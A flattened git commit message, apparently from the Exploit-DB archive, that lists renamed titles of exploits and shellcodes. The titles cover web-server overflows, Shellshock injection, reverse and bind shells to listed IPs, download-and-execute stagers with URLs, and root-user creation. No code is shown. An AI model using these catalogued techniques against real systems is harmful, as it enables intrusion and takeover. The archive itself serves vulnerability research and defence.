From cf96346519b15a0b508f8984be86815026e215c0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Jan 2018 18:22:06 +0000 Subject: [PATCH] DB: 2018-01-25 124 changes to exploits/shellcodes Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC) Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC) Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC) Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC) Novell ZenWorks 10/11 - TFTPD Remote Code Execution Novell ZENworks 10/11 - TFTPD Remote Code Execution Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service GoAhead Web Server 2.1 (Windows) - Denial of Service Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service Lorex LH300 Series - ActiveX Buffer Overflow (PoC) Debut Embedded httpd 1.20 - Denial of Service Debut Embedded HTTPd 1.20 - Denial of Service Xorg 1.4 < 1.11.2 - File Permission Change X.Org xorg 1.4 < 1.11.2 - File Permission Change Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit) Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit) ICU library 52 < 54 - Multiple Vulnerabilities rooter VDSL Device - Goahead WebServer Disclosure FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow Debian 2.1 - httpd Debian 2.1 - HTTPd Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String W3C CERN httpd 3.0 Proxy - Cross-Site Scripting W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting ATP httpd 0.4 - Single Byte Buffer Overflow ATP HTTPd 0.4 - Single Byte Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow Light HTTPd 0.1 - GET Buffer Overflow (1) Light HTTPd 0.1 - GET Buffer Overflow (2) Light HTTPd 0.1 - 'GET' Buffer Overflow (1) Light HTTPd 0.1 - 'GET' Buffer Overflow (2) Light HTTPD 0.1 (Windows) - Remote Buffer Overflow Light HTTPd 0.1 (Windows) - Remote Buffer Overflow Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit) Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit) BusyBox 1.01 - HTTPD Directory Traversal BusyBox 1.01 - HTTPd Directory Traversal Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1) Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1) Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2) Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2) Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection Apache mod_cgi - 'Shellshock' Remote Command Injection Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection Apache mod_cgi - 'Shellshock' Remote Command Injection IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit) GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit) GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit) Getsimple 2.01 - Local File Inclusion Getsimple CMS 2.01 - Local File Inclusion Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit) Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit) ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution ManageEngine EventLog Analyzer - Multiple Vulnerabilities ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1) Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) Getsimple 3.0 - 'set' Local File Inclusion Getsimple CMS 3.0 - 'set' Local File Inclusion ZENworks Configuration Management 11.3.1 - Remote Code Execution Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution Kaseya Virtual System Administrator - Multiple Vulnerabilities (1) Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1) Getsimple - 'path' Local File Inclusion Getsimple CMS 3.1.2 - 'path' Local File Inclusion Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit) SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit) ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection BMC Track-It! 11.4 - Multiple Vulnerabilities Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities SysAid Help Desk 14.4 - Multiple Vulnerabilities Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities GetSimple CMS 3.3.1 - Cross-Site Scripting CMS Made Simple 1.11.9 - Multiple Vulnerabilities ManageEngine Desktop Central - Create Administrator ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2) ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) Linux/x64 - execve(/bin/sh) Shellcode (33 bytes) NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) UnixWare - execve(/bin/sh) Shellcode (95 bytes) Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) UnixWare - execve(/bin/sh) Shellcode (95 bytes) Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x86 (XP SP3) - ShellExecuteA Shellcode Windows/x86 (XP SP3) - ShellExecuteA() Shellcode Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F Shellcode (47 bytes) Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes) Linux/i686 - pacman -R Shellcode (59 bytes) Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F Shellcode (47 bytes) Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes) Linux/i686 - pacman -R Shellcode (59 bytes) Windows/x86 - JITed Stage-0 Shellcode Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 - MessageBox Shellcode (Metasploit) Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode Windows/x86 - MessageBox Shellcode (Generator) (Metasploit) Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes) Windows/x64 (7) - cmd.exe Shellcode (61 bytes) Windows - MessageBoxA Shellcode (238 bytes) Windows - MessageBoxA() Shellcode (238 bytes) Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) Linux/x64 - Disable ASLR Security Shellcode (143 bytes) Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator) Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes) Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator) Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes) Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes) Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes) OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit) Windows/x86 - Eggsearch Shellcode (33 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes) Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) Linux/x86 - rmdir() Shellcode (37 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) Linux/x86 - rmdir() Shellcode (37 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) Linux/x86-64 - execve() Encoded Shellcode (57 bytes) Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode Linux/x64 - execve() Encoded Shellcode (57 bytes) Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator) Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes) Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes) OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes) Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator) Windows/x64 (2003) - Token Stealing Shellcode (59 bytes) OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) Linux/x64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86-64 - execve() Shellcode (22 bytes) Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes) Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - execve() Shellcode (22 bytes) Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes) Linux/x64 - execve() + Polymorphic Shellcode (31 bytes) Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) Linux/x64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) Linux/x64 - Read /etc/passwd Shellcode (65 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Linux/x86-64 - Bind TCP Shell Shellcode (Generator) Linux/x64 - Bind TCP Shell Shellcode (Generator) Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes) BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes) BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) Windows/x86 - MessageBoxA Shellcode (242 bytes) Windows/x86 - MessageBoxA() Shellcode (242 bytes) Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) Linux/x64 - Read /etc/passwd Shellcode (82 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes) Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes) Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes) Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes) Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 